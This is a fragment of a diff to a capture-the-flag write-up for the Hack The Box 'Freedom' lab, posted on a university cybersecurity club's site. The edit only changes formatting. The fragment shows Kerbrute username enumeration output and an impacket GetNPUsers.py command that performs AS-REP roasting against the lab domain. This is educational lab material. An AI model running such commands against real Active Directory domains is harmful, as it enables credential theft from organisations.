MQCybersec/mqcybersec-website/src/content/writeups/24-htbuni-freedom.md

 2024/12/18 01:15:09 >  Done!
 Tested 88 usernames (2 valid) in 0.128 seconds
 ```

 Cool!
-So, what can we do with these users, Kerbrute looks for pre-auth so we could try those usernames with `impacket`'s `getNPUsers.py`.
+So, what can we do with these users, Kerbrute looks for pre-auth so we could try those usernames with impacket's `getNPUsers.py`.

 ```bash
 $ ./GetNPUsers.py freedom.htb/ -dc-ip freedom.htb -usersfile ../../../../users.txt -format hashcat -outputfile hashes.txt